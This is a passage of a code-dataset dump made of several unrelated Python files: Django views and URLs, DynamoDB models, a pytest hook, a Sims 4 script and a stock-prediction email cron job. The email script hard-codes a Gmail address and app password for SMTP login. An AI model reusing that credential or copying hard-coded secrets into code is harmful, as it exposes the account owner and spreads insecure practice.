{}\n\t\t#weights = [48, 30, 42, 36, 36, 42, 42, 36, 24, 30, 30, 36, 36,98,90,10]\n\t\t#values = [10, 30, 25, 50, 35, 15, 40, 30, 35, 45, 10, 30, 25,40,45,30]\n\t\tdata['weights'] = weights\n\t\tdata['values'] = values\n\t\tprint(data['weights'],data['values'])\n\t\tdata['items'] = list(range(len(weights)))\n\t\tdata['num_items'] = len(weights)\n\t\tnum_bins = len(racks)\n\t\tdata['bins'] = list(range(num_bins))\n\t\tdata['bin_capacities']=[int(i.capacity) for i in all_vaccantracknames if i.rackname in racks]\n\t\t\n\t\tnbin=[]\n\t\t\n\t\tnbin=racks#[str(i.rackname) for i in all_vaccantracknames]\n\t\t\n\t\tll=list(zip(data['bin_capacities'],nbin))\n\t\tprint(\"ll values\",ll)\n\t\tsolver = pywraplp.Solver.CreateSolver('SCIP')\n\t\t#print(\"nbin\",nbin)\n\t\tx = {}\n\t\tfor i in data['items']:\n\t\t\tfor j in data['bins']:\n\t\t\t\tx[(i, j)] = solver.IntVar(0, 1, 'x_%i_%i' % (i, j))\n\t\t#print(x)\n\n\t\tfor i in data['items']:\n\t\t\tsolver.Add(sum(x[i, j] for j in data['bins']) <= 1)\n\t\tfor j in data['bins']:\n\t\t\tsolver.Add(\n\t\t\t\tsum(x[(i, j)] * data['weights'][i]\n\t\t\t\t\tfor i in data['items']) <= data['bin_capacities'][j])\n\t\tobjective = solver.Objective()\n\t\tfor i in data['items']:\n\t\t\tfor j in data['bins']:\n\t\t\t\tobjective.SetCoefficient(x[(i, j)], data['values'][i])\n\t\tobjective.SetMaximization()\n\t\tstatus = solver.Solve()\n\t\tif status == pywraplp.Solver.OPTIMAL:\n\t\t\tdf={}\n\t\t\ttotal_weight = 0\n\t\t\tfor j in data['bins']:\n\t\t\t\tsubd={}\n\t\t\t\tbin_weight = 0\n\t\t\t\tbin_value = 0\n\t\t\t\tsubd['bin']=nbin[j]\n\t\t\t\t#print('Bin ', nbin[j], '\\n')\n\t\t\t\tt=[]\n\t\t\t\tfor i in data['items']:\n\t\t\t\t\t#print(x[i,j].solution_value(),\"xxxx\")\n\t\t\t\t\tif x[i, j].solution_value() > 0:\n\t\t\t\t\t\tt.append(i)\n\t\t\t\t\t\tprint('Item', i, '- weight:', data['weights'][i], ' value:',data['values'][i])\n\t\t\t\t\t\tbin_weight += data['weights'][i]\n\t\t\t\t\t\tbin_value += data['values'][i]\n\t\t\t\tsubd['items']=t\n\t\t\t\tsubd['packedwt']=bin_weight\n\t\t\t\tsubd['packedval']=bin_value\n\t\t\t\t#print('Packed bin weight:', bin_weight)\n\t\t\t\t#print('Packed bin value:', bin_value)\n\t\t\t\t#print()\n\t\t\t\ttotal_weight += bin_weight\n\t\t\t\tif(bin_weight!=0):\n\t\t\t\t\tdf[j+1]=subd\n\t\t\t#df[0]=[int(objective.Value()),total_weight]\n\t\t#content={'total_prof':int(objective.Value()),'total_weight':total_weight} \n\t\t# for i in df.values():\n\t\t# \tr=VaccantRacks.objects.get(rackname=i['bins'])\n\t\t# \tcap=r.capacity-bin_weight\n\t\t# \tVaccantRacks.objects.filter(rackname=i['bins']).update(capacity=cap)\n\t\tprint(df)\n\t\tprint(\"=========\")\n\t\t\n\t\tfor i in df.values():\n\t\t\tt = VaccantRacks.objects.get(rackname=i['bin'])\n\t\t\tprint(t.capacity,\"TTTT\",i['packedwt'])\n\t\t\tt.capacity =t.capacity-i['packedwt']\n\t\t\tt.save()\n\t\t\n\t\t\n\t\t # change field\n\t\t\t\n\n\n\n\ttext=\"This is my text\"\n\t# a=10\n\t# b=10\n\t# a=a+b\n\tcontent={\n\t 't':text,\n\t 'cal':10,\n\t}\n\n\treturn render(request,'calc/index.html',{'d0':df,'d1':content,'d2':['sas','asda','asfd']})\n\n\n\n\n\n\ndef index(request):\n\tif request.method==\"POST\":\n\t\tweight=request.POST['weights']\n\treturn HttpResponse(\"d\")\n\n\"\"\"def button(request):\n\treturn render(request,'calc/index.html')\ndef output(request):\n\tdata=requests.get(\"https://www.google.com/\")\n\tprint(data.text)\n\tdata=data.text\n\treturn render(request,'calc/index.html',{'data':data})\ndef external(request):\n\tinp= request.POST.get('param')\n\tout= run([sys.executable,'C://Te proj//entripot//calc//tp.py',inp,\"args1\",\"args2\"],shell=False,stdout=PIPE)\n\tprint(out)\n\treturn render(request,'calc/index.html',{'data1':out.stdout})\ndef button(request):\n\treturn render(request,'calc/index.html')\ndef output(request):\n\tdata=requests.get(\"https://www.google.com/\")\n\tprint(data.text)\n\tdata=data.text\n\treturn render(request,'calc/index.html',{'data':data})\"\"\"\n\n","sub_path":"calc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"616265022","text":"import webapp2\nimport base_page\nfrom google.appengine.ext import ndb\nfrom google.appengine.api import images\nfrom google.appengine.ext import blobstore\nimport db_defs\n\nclass Edit(base_page.BaseHandler):\n def __init__(self, request, response):\n self.initialize(request, response)\n self.template_values = {}\n self.template_values['edit_url'] = blobstore.create_upload_url('/edit/channel')\n\n def get(self):\n if self.request.get('type') == 'channel':\n channel_key = ndb.Key(urlsafe=self.request.get('key'))\n channel = channel_key.get()\n if channel.icon:\n self.template_values['img_url']= images.get_serving_url(channel.icon, crop=True, size=64)\n self.template_values['channel'] = channel\n classes = db_defs.ChannelClass.query(ancestor=ndb.Key(db_defs.ChannelClass, self.app.config.get('default-group')))\n class_boxes = []\n for c in classes:\n if c.key in channel.classes:\n class_boxes.append({'name':c.name,'key':c.key.urlsafe(),'checked':True})\n else:\n class_boxes.append({'name':c.name,'key':c.key.urlsafe(),'checked':False})\n self.template_values['classes'] = class_boxes\n self.render('edit.html', self.template_values)\n","sub_path":"dynamic/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"220162030","text":"\"\"\"\n cloudalbum/database/model_ddb.py\n ~~~~~~~~~~~~~~~~~~~~~~~\n Application data model defined here.\n\n :description: CloudAlbum is a fully featured sample application for 'Moving to AWS serverless' training course\n :copyright: © 2019 written by Dayoungle Jun, Sungshik Jou.\n :license: MIT, see LICENSE for more details.\n\"\"\"\nfrom datetime import datetime\nfrom pynamodb.models import Model\nfrom pynamodb.attributes import UnicodeAttribute, NumberAttribute, UTCDateTimeAttribute\nfrom pynamodb.indexes import GlobalSecondaryIndex, IncludeProjection\nfrom tzlocal import get_localzone\nimport json\nimport boto3\n\n\nAWS_REGION = boto3.session.Session().region_name\n\n\nclass EmailIndex(GlobalSecondaryIndex):\n \"\"\"\n This class represents a global secondary index\n \"\"\"\n\n class Meta:\n index_name = 'user-email-index'\n read_capacity_units = 2\n write_capacity_units = 1\n projection = IncludeProjection(['password'])\n\n # This attribute is the hash key for the index\n # Note that this attribute must also exist\n # in the model\n email = UnicodeAttribute(hash_key=True)\n\n\nclass User(Model):\n \"\"\"\n User table for DynamoDB\n \"\"\"\n\n class Meta:\n table_name = 'User'\n region = AWS_REGION\n\n id = UnicodeAttribute(hash_key=True)\n email_index = EmailIndex()\n email = UnicodeAttribute(null=False)\n username = UnicodeAttribute(null=False)\n password = UnicodeAttribute(null=False)\n\n\nclass Photo(Model):\n \"\"\"\n Photo table for DynamoDB\n \"\"\"\n\n class Meta:\n table_name = 'Photo'\n region = AWS_REGION\n\n user_id = UnicodeAttribute(hash_key=True)\n id = UnicodeAttribute(range_key=True)\n tags = UnicodeAttribute(null=True)\n desc = UnicodeAttribute(null=True)\n filename_orig = UnicodeAttribute(null=True)\n filename = UnicodeAttribute(null=True)\n filesize = NumberAttribute(null=True)\n geotag_lat = UnicodeAttribute(null=True)\n geotag_lng = UnicodeAttribute(null=True)\n upload_date = UTCDateTimeAttribute(default=datetime.now(get_localzone()))\n taken_date = UTCDateTimeAttribute(null=True)\n make = UnicodeAttribute(null=True)\n model = UnicodeAttribute(null=True)\n width = UnicodeAttribute(null=True)\n height = UnicodeAttribute(null=True)\n city = UnicodeAttribute(null=True)\n nation = UnicodeAttribute(null=True)\n address = UnicodeAttribute(null=True)\n\n\nclass ModelEncoder(json.JSONEncoder):\n def default(self, obj):\n if hasattr(obj, 'attribute_values'):\n return obj.attribute_values\n elif isinstance(obj, datetime):\n return obj.isoformat()\n return json.JSONEncoder.default(self, obj)\n\n\ndef photo_deserialize(photo):\n photo_json = {}\n photo_json['id'] = photo.id\n photo_json['filename'] = photo.filename\n photo_json['filename_orig'] = photo.filename_orig\n photo_json['filesize'] = photo.filesize\n photo_json['upload_date'] = photo.upload_date\n photo_json['tags'] = photo.tags\n photo_json['desc'] = photo.desc\n photo_json['geotag_lat'] = photo.geotag_lat\n photo_json['geotag_lng'] = photo.geotag_lng\n photo_json['taken_date'] = photo.taken_date\n photo_json['make'] = photo.make\n photo_json['model'] = photo.model\n photo_json['width'] = photo.width\n photo_json['height'] = photo.height\n photo_json['city'] = photo.city\n photo_json['nation'] = photo.nation\n photo_json['address'] = photo.address\n return photo_json\n\n","sub_path":"LAB03/02-S3/backend/cloudalbum/database/model_ddb.py","file_name":"model_ddb.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"536155262","text":"# For easy inspection on what dependencies were used in test.\ndef pytest_report_header(config):\n import sys\n\n s = \"\\nFull Python Version: \\n{0}\\n\\n\".format(sys.version)\n\n try:\n import warnings\n from astropy.utils.introspection import resolve_name\n except ImportError:\n return s\n\n for module_name in ('requests', 'numpy', 'astropy'):\n try:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", DeprecationWarning)\n module = resolve_name(module_name)\n except ImportError:\n s += \"{0}: not available\\n\".format(module_name)\n else:\n try:\n version = module.__version__\n except AttributeError:\n version = 'unknown (no __version__ attribute)'\n s += \"{0}: {1}\\n\".format(module_name, version)\n\n return s\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"92666798","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ImageMetadata(Model):\n \"\"\"Image metadata.\n\n :param width: Image width\n :type width: int\n :param height: Image height\n :type height: int\n :param format: Image format\n :type format: str\n \"\"\"\n\n _attribute_map = {\n 'width': {'key': 'width', 'type': 'int'},\n 'height': {'key': 'height', 'type': 'int'},\n 'format': {'key': 'format', 'type': 'str'},\n }\n\n def __init__(self, width=None, height=None, format=None):\n super(ImageMetadata, self).__init__()\n self.width = width\n self.height = height\n self.format = format\n","sub_path":"azure-cognitiveservices-vision-computervision/azure/cognitiveservices/vision/computervision/models/image_metadata.py","file_name":"image_metadata.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"21696008","text":"'''\nThis is a program to print the missing letter that tend to form the pallindrome string\n'''\n\ns=input()\ns1=s[::-1]\nfor i in range(len(s)//2):\n print(s[i],s1[i])\n if(s1[i]!=s[i]):\n s2=s[i:len(s)-i]\n break\nif(s2[1:]==s2[:0:-1]):\n print(s2[0])\nelse:\n print(s2[-1])\n","sub_path":"missingpalindrome.py","file_name":"missingpalindrome.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"51841548","text":"from django.conf.urls import url\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . import views\n\n\nurlpatterns = [\n # navigation urls\n # ---------------\n\n url(r'^$', views.blog, name=\"index\"),\n # url(r'^home/$', views.home, name=\"home\"),\n url(r'^trash/$', views.trash, name=\"trash\"),\n url(r'^add/$', views.add, name=\"add\"),\n\n # blog categories\n # ---------------\n url(r'^(?P[\\w]+)$', views.category, name=\"category\"),\n\n # blog CRUD urls\n # --------------\n url(r'^(?P[0-9]+)/$', views.detail, name=\"detail\"),\n url(r'^(?P[0-9]+)/trash_detail/$', views.trash_detail, name=\"trash_detail\"),\n url(r'^(?P[0-9]+)/edit/$', views.edit, name=\"edit\"),\n url(r'^(?P[0-9]+)/delete/$', views.delete, name=\"delete\"),\n url(r'^(?P[0-9]+)/delete_trash/$', views.delete_trash, name=\"delete_trash\"),\n url(r'^(?P[0-9]+)/comment/$', views.comment, name=\"comment\"),\n url(r'^(?P[0-9]+)/like/$', views.like, name=\"like\"),\n url(r'^(?P[0-9]+)/share/$', views.share, name=\"share\"),\n\n # commenting system urls\n # ----------------------\n url(r'^edit_comment/(?P[0-9]+)/$', views.edit_comment, name=\"edit_comment\"),\n url(r'^del_comment/(?P[0-9]+)/$', views.del_comment, name=\"del_comment\"),\n\n # user management\n # -----------------\n url(r'^sign_up/$', views.sign_up, name=\"sign_up\"),\n url(r'^user_login/$', views.user_login, name=\"user_login\"),\n url(r'^user_logout/$', views.user_logout, name=\"user_logout\"),\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"566996202","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 8 15:15:26 2019\r\n\r\n@author: 赵利渊\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom pymysql import connect\r\nimport sqlalchemy as sql\r\nfrom util.xdebug import dd\r\nfrom sqlhelper import batch\r\nfrom time import strftime\r\nfrom datetime import datetime,timedelta\r\nfrom optparse import OptionParser\r\nfrom ipdb import set_trace\r\n\r\nclass load:\r\n \r\n def __init__(self, suid, euid):\r\n self.suid=suid\r\n self.euid=euid\r\n \r\n def data(self):\r\n suid = self.suid\r\n euid = self.euid\r\n\r\n # 连接到现在的数据库\r\n db = batch.connection('prophet')\r\n metadata = sql.MetaData(bind=db)\r\n t = sql.Table('prophet_cash_cycle', metadata, autoload=True)\r\n columns = [\r\n t.c.cc_uid,\r\n t.c.cc_age,\r\n t.c.cc_investable_asset,\r\n t.c.cc_expenditure_asset,\r\n t.c.created_at,\r\n ]\r\n s = sql.select(columns)\r\n baseDf = pd.read_sql(s,db)\r\n baseDf.sort_values(by = ['created_at'], ascending = False, inplace = True)\r\n baseDf.drop_duplicates(subset = ['cc_uid','cc_age'],keep = 'first', inplace = True)\r\n baseDf.sort_values(by = ['cc_age'], ascending = True, inplace = True)\r\n \r\n # 每个用户求和\r\n #single.sort_values(by = ['cc_investable_asset'], ascending = True, inplace = True)\r\n\r\n # 找数据方便计算收入和开支的关系\r\n db = batch.connection('prophet')\r\n metadata = sql.MetaData(bind=db)\r\n t = sql.Table('prophet_cash_cycle', metadata, autoload=True)\r\n columns = [\r\n t.c.cc_uid,\r\n t.c.cc_age,\r\n t.c.cc_expenditure_asset,\r\n t.c.created_at,\r\n ]\r\n s = sql.select(columns)\r\n df1 = pd.read_sql(s,db)\r\n df1.sort_values(by = ['created_at'], ascending = False, inplace = True)\r\n df1.columns = ['uid','age','expenditure','created_at']\r\n df1.drop_duplicates(subset = ['uid','age'],keep = 'first', inplace = True)\r\n df1.drop('created_at', axis = 1, inplace = True)\r\n df1.set_index(['uid', 'age'], inplace = True)\r\n \r\n db = batch.connection('prophet')\r\n metadata = sql.MetaData(bind=db)\r\n t = sql.Table('prophet_family_income_detail', metadata, autoload=True)\r\n columns = [\r\n t.c.fi_uid,\r\n t.c.fi_age,\r\n t.c.fi_income_asset,\r\n t.c.created_at,\r\n ]\r\n s = sql.select(columns)\r\n df2 = pd.read_sql(s,db)\r\n df2.sort_values(by = ['created_at'], ascending = False, inplace = True)\r\n df2.columns = ['uid','age','income','created_at']\r\n income = df2.copy().groupby(['uid','age'])['income'].sum()\r\n df2.drop('income', axis = 1, inplace = True)\r\n df2.drop_duplicates(subset = ['uid','age'],keep = 'first', inplace = True)\r\n df2.set_index(['uid', 'age'], inplace = True)\r\n df2['income'] = income\r\n df2.drop('created_at', axis = 1, inplace = True)\r\n \r\n df = pd.merge(df1, df2, left_index = True, right_index = True)\r\n \r\n excel = pd.ExcelWriter('output.xlsx')\r\n baseDf.to_excel(excel,'年开支和年龄的关系')\r\n df.to_excel(excel, '年收入和年支出的关系')\r\n excel.save() \r\n\r\n\r\nif __name__ == '__main__':\r\n optParser = OptionParser(usage='usage: %prog [options]')\r\n startId = '0000000000'\r\n endId = '9999999999'\r\n optParser.add_option('-s', '--suid', help='start uid', dest='suid', type='string', default=startId)\r\n optParser.add_option('-e', '--euid', help='end uid', dest='euid', type='string', default=endId)\r\n options,args = optParser.parse_args()\r\n load = load(options.suid, options.euid)\r\n load.data()\r\n","sub_path":"shell/loadData.py","file_name":"loadData.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"429324114","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\objects\\components\\new_object_component.py\n# Compiled at: 2017-06-07 20:18:54\n# Size of source mod 2**32: 2873 bytes\nimport operator\nfrom interactions.base.super_interaction import SuperInteraction\nfrom objects.components import Component\nfrom sims4.tuning.tunable import TunableSet\nfrom statistics.commodity import Commodity\nimport objects.components.types, sims4\n\nclass NewObjectTuning:\n NEW_OBJECT_COMMODITY = Commodity.TunableReference()\n NEW_OBJECT_AFFORDANCES = TunableSet(description='\\n Affordances available on an object as long as its considered as new.\\n ',\n tunable=SuperInteraction.TunableReference(description='\\n Affordance reference to add to new objects.\\n ',\n pack_safe=True))\n\n\nclass NewObjectComponent(Component, component_name=objects.components.types.NEW_OBJECT_COMPONENT, allow_dynamic=True):\n\n def __init__(self, *args, **kwargs):\n (super().__init__)(*args, **kwargs)\n self._initialize_commodity()\n self.owner.is_new_object = True\n\n def _initialize_commodity(self):\n new_object_commodity = self.owner.commodity_tracker.add_statistic(NewObjectTuning.NEW_OBJECT_COMMODITY)\n threshold = sims4.math.Threshold(new_object_commodity.min_value, operator.le)\n self._commodity_listener = self.owner.commodity_tracker.create_and_add_listener(NewObjectTuning.NEW_OBJECT_COMMODITY.stat_type, threshold, self._new_object_expired)\n\n def component_super_affordances_gen(self, **kwargs):\n if not self.owner.is_new_object:\n return\n yield from NewObjectTuning.NEW_OBJECT_AFFORDANCES\n if False:\n yield None\n\n def _new_object_expired(self, stat):\n self.owner.is_new_object = False\n self.owner.commodity_tracker.remove_listener(self._commodity_listener)\n self.owner.remove_component(objects.components.types.NEW_OBJECT_COMPONENT)\n\n def on_add(self, *_, **__):\n self.owner.update_component_commodity_flags()\n\n def on_remove(self, *_, **__):\n self.owner.update_component_commodity_flags()\n if self._commodity_listener is None:\n return\n self.owner.commodity_tracker.remove_listener(self._commodity_listener)\n self._commodity_listener = None","sub_path":"Scripts/simulation/objects/components/new_object_component.py","file_name":"new_object_component.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"250353158","text":"import os, copy\nimport smtplib\nimport requests\nfrom bs4 import BeautifulSoup\nimport sys\nfrom string import Template\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom IPython.display import Image\n#알고리즘 자동화\nimport sqlite3\nfrom cron_lstm import main_lstm\nfrom cron_prophet import fb_main_am\nimport numpy as np\nfrom datetime import datetime, timedelta\n\n\nBASE = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nclass EmailHTMLContent:\n # 이메일에 담길 컨텐츠\n def __init__(self, str_subject, str_image_file_name1,str_image_file_name2,template, template_params1, template_params2, template_params3):\n #string template과 딕셔너리형 template_params를 받아 MIME 메세지 생성\n # EmailHTMLContent(str_subject, str_image_file_name1,str_image_file_name2, template, template_params1, template_params2, template_params3)\n # assert 조건, 메세지\n assert isinstance(template, Template)\n assert isinstance(template_params1, dict)\n assert isinstance(template_params2, dict)\n assert isinstance(template_params3, dict)\n self.msg = MIMEMultipart()\n \n # 이메일 제목 설정\n self.msg['Subject'] = str_subject\n \n # 이메일 본문 설정\n str_msg = template.safe_substitute(**template_params1, **template_params2, **template_params3) # ${변수} 치환하며 문자열 만듬\n \n mime_msg = MIMEText(str_msg, 'html') # MIME HTML 문자열 만듬\n self.msg.attach(mime_msg)\n \n assert template.template.find(\"cid:\" + str_cid_name1) >= 0, 'template must have cid for embedded image.'\n assert os.path.isfile(str_image_file_name1), 'image file does not exist.'\n with open(str_image_file_name1, 'rb') as img_file:\n mime_img = MIMEImage(img_file.read())\n mime_img.add_header('Content-ID', '<' + str_cid_name1+ '>')\n self.msg.attach(mime_img)\n\n assert template.template.find(\"cid:\" + str_cid_name2) >= 0, 'template must have cid for embedded image.'\n assert os.path.isfile(str_image_file_name2), 'image file does not exist.'\n with open(str_image_file_name2, 'rb') as img_file:\n mime_img = MIMEImage(img_file.read())\n mime_img.add_header('Content-ID', '<' + str_cid_name2+ '>')\n self.msg.attach(mime_img) \n \n def get_message(self, from_email_address, to_email_address):\n # 발신자, 수신자 리스트를 이용하여 보낼 메세지를 만든다\n mm = copy.deepcopy(self.msg)\n mm['From'] = from_email_address #발신자\n mm['To'] = \",\".join(to_email_address) #수신자 리스트\n return mm\n \nclass EmailSender:\n #이메일 발송자\n def __init__(self, str_host, num_port=25):\n #호스트와 포트번호로 SMTP 연결\n self.str_host = str_host\n self.num_port = num_port\n self.ss = smtplib.SMTP(str_host, num_port)\n self.ss.starttls() #TLS시작\n self.ss.login('bziwnsizd@gmail.com', 'kzifazlwreorlycn') #메일서버에 연결한 계정과 비밀번호\n \n def send_message(self, emailContent, from_email_address, to_email_address):\n #이메일 발송\n cc = emailContent.get_message(from_email_address, to_email_address)\n self.ss.send_message(cc, from_addr=from_email_address, to_addrs=to_email_address)\n del cc\n\ndef conv_stock(stock_name):\n content = stock_name\n url = 'https://search.daum.net/search?w=tot&DA=YZR&t__nil_searchbox=btn&sug=&sugo=&sq=&o=&q={0}주식'.format(content)\n html = requests.get(url).text.strip()\n soup = BeautifulSoup(html, 'html5lib')\n print(url)\n stock_num1 = soup.find(\"span\", {\"class\":\"txt_sub\"}).get_text()\n # stock_num = stock_num1\n stock_num = str(stock_num1[:6])\n category = str(stock_num1[7:])\n cate = \"\"\n if category == \"코스피\":\n cate='.KS'\n elif category ==\"코스닥\":\n cate=\".KQ\"\n # print(stock_num+cate)\n code=stock_num+cate\n \n return code\n\ndef error_email(comp_name, key):\n print(\"=======에러=========\")\n pass\n \n\n\n# DB 내용 출력\ncon = sqlite3.connect(\"./db.sqlite3\") # ===========> .한개로 줄임(바로 위에 폴더로 이동 후 조회하도록 변경)\n# cursor = moredata로부터 이메일 값만 받아오기\ncursor = con.cursor()\n# corsor_comp = moredata로부터 기업 값만 받아오기\ncoursor_comp = con.cursor()\n# cursor_group = moredata로부터 입력된 이메일에대한 구독한 기업정보들\ncursor_group = con.cursor()\n\n# cursor\ncursor.execute(\"SELECT email FROM blog_moredata;\")\ndb_email = cursor.fetchall()\n# 이메일 중복 제거 \ndb_email = set(db_email) # email 발송 리스트용\n\n# cursor_comp\ncursor.execute(\"SELECT content FROM blog_moredata;\")\ndb_comp = cursor.fetchall()\ncomp_list = []\nfor i in db_comp:\n for j in i:\n comp_list.append(j)\n\ncomp = []\nfor i in db_email:\n for j in i:\n comp.append(j)\n\n# 각 email별 보내야하는 기업들 \na = [] \noutput = {} # 각 기업별 출력값\nfor i in comp:\n # 이메일값\n a.append(i)\n data = i\n # print(data)\n a = []\n # corsor_comp\n cursor_group.execute(\"SELECT content FROM blog_moredata WHERE email = (?);\", (data,))\n corp_list = cursor_group.fetchall() # 출력 예시 [('카카오게임즈',), ('삼성전자',)]\n tmp = []\n out = {}\n # json으로 넘길 수 있는 dictionary 만들기\n for n, tmp_corp in enumerate(corp_list):\n tmp.append(str(tmp_corp[0]))\n # print(\"list로 저장할 기업명 \",tmp)\n # 이메일에 대한 구독한 기업들\n out[i] = tmp\n output.update(out)\nprint(\"dict값\",output) # dict값 [{'ka030202@naver.com': ['카카오게임즈', '삼성전자']}]\n\n\n# =======================================================================================================\n# 알고리즘 시작\n# 머신 이용한 png 출력\n\nfor key, value in output.items(): # db_comp = 기업 정보들\n print(key)\n for corp in value:\n error_result = \"\"\n try:\n event = conv_stock(corp)\n\n #cron_list.py 에 입력값 : 기업종목\n tomorrow_prediction =main_lstm(event)\n print(\"종가예측 가능\",tomorrow_prediction)\n\n #cron_prophet.py 에 입력값 : 기업종목 (날짜의 경우 cron_prophet에서 가져감.)\n real_event = event[:6]\n real1, real2 = fb_main_am(real_event)\n print(\"real stock가능\", real1, real2)\n\n # 이메일 전송 시작\n\n # 이메일에 보낼 기업에 대한 이미지 정보 jpg\n # 기업별로 email 전송\n closing = BASE + '\\\\cron_AM\\\\img\\\\closing_stock\\\\closing_img.png'\n real_am = BASE + '\\\\cron_AM\\\\img\\\\real_time\\\\am_plot.png'\n real_pm = BASE + '\\\\cron_AM\\\\img\\\\real_time\\\\pm_plot.png'\n\n str_host = 'smtp.gmail.com'\n num_port = 587\n\n emailSender = EmailSender(str_host, num_port)\n\n str_subject = '구독하신 오늘의 주가 정보입니다.' # e메일 제목\n template = Template(\"\"\"\n \n \n 기업명 ${NAME}.
\n
\n
\n 해당 종목의 오전 추천 매수가는 ${real1} 입니다.
\n 해당 종목의 오전 추천 매수가는 ${real2} 입니다.
\n 테스트입니다.\n \n \"\"\")\n \n # text_message = \"내일의 예측 종가 : {0} \\n\\n\\n 해당종목의 오전 추천 매수가 : {1} \\n\\n\\n 해당종목의 오전 추천 매도가 : {2}\".format(tomorrow_prediction[0],real1, real2 )\n template_params1 = {'NAME':corp}\n template_params2 = {'real1': real1}\n template_params3 = {'real2': real2}\n str_image_file_name1 = BASE + '\\\\cron_AM\\\\img\\\\closing_stock\\\\closing_img.png'\n str_image_file_name2 = BASE + '\\\\cron_AM\\\\img\\\\real_time\\\\real_am.png'\n str_cid_name1 = 'my_image1'\n str_cid_name2 = 'my_image2'\n\n emailHTMLContent = EmailHTMLContent(str_subject, str_image_file_name1,str_image_file_name2, template, template_params1, template_params2, template_params3)\n\n from_email_address = 'bziwnsizd@gmail.com' #발신자\n to_email_address = key \n emailSender.send_message(emailHTMLContent, from_email_address, to_email_address)\n\n # 이미지 삭제해야하는 코드 추가하기\n os.remove(closing)\n os.remove(real_am)\n os.remove(real_pm)\n\n # 비상장 기업 or 신규 기업 or 크롤링 불가\n except ValueError: \n error_email(value,corp)\n except AttributeError: \n error_email(value,corp)\n else:\n print(\"그 밖의 에러\")\n","sub_path":"cron_AM/cron_email_am.py","file_name":"cron_email_am.py","file_ext":"py","file_size_in_byte":9331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"130537693","text":"import unittest\n\nfrom dataAccessLayer.helper import db\nfrom dataAccessLayer.repositories.wordCountRepository import WordCountRepository\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\nclass TestWordCountRepository(unittest.TestCase):\n\n def setUp(self):\n engine = create_engine('sqlite:///:memory:', echo=False)\n db.create_tables(engine)\n\n Session = sessionmaker(bind=engine)\n self.session = Session()\n self.word_count_repository = WordCountRepository(self.session)\n\n\n def tearDown(self):\n self.session.close()\n\n def test_create_word_count_with_one_word(self):\n self.word_count_repository.create_word_count('test', 2, 1)\n\n result_word_count = self.word_count_repository\\\n .get_word_counts_by_website_id(1)\n\n assert result_word_count[0][1] == 'test'\n assert result_word_count[0][2] == 2\n\n def test_create_word_count_with_three_words(self):\n test_words = [('test', 2, 100),\n ('pero', 10, 21),\n ('gusto', 2, 23000)]\n\n for test_word in test_words:\n self.word_count_repository.create_word_count(test_word[0],\n test_word[1],\n test_word[2])\n\n for test_word in test_words:\n result_word_count = self.word_count_repository\\\n .get_word_counts_by_website_id(test_word[2])\n assert result_word_count[0][1] == test_word[0]\n assert result_word_count[0][2] == test_word[1]\n","sub_path":"dataAccessLayer/tests/wordCountRepository_test.py","file_name":"wordCountRepository_test.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"3008050","text":"import sys\r\nsys.path.append('C:/dafapp/ibank/accounting/scripts/appinterface')\r\nimport RemoteCreateJournal\r\nimport com.ihsan.foundation.pobjecthelper as phelper\r\n\r\ndef FunctionMain(config, request, response):\r\n request.KdCabg\r\n request.KdValt\r\n #message for create_candidateJurnal\r\n #format \"keterangan;user_id;nama_tabel_batch;no_urut;tanggal;kodeaplikasi$\"\r\n message = \"'Tes interface CBAT';\"+request.UserID+\";;;Current_Date;$\"\r\n #send to create_candidateJurnal\r\n answer = create_candidateJurnal(config,message,response)\r\n \r\n response.NoBatch = 'M1234'\r\n response.RespCode = '00'\r\n response.RespMesg = 'Transaksi Berhasil'\r\n\r\n#**********************************************************\r\n#function create_candidateJurnal\r\n# DESCRIPTION\r\n# menangkap message date sebuah batch dalam satu form 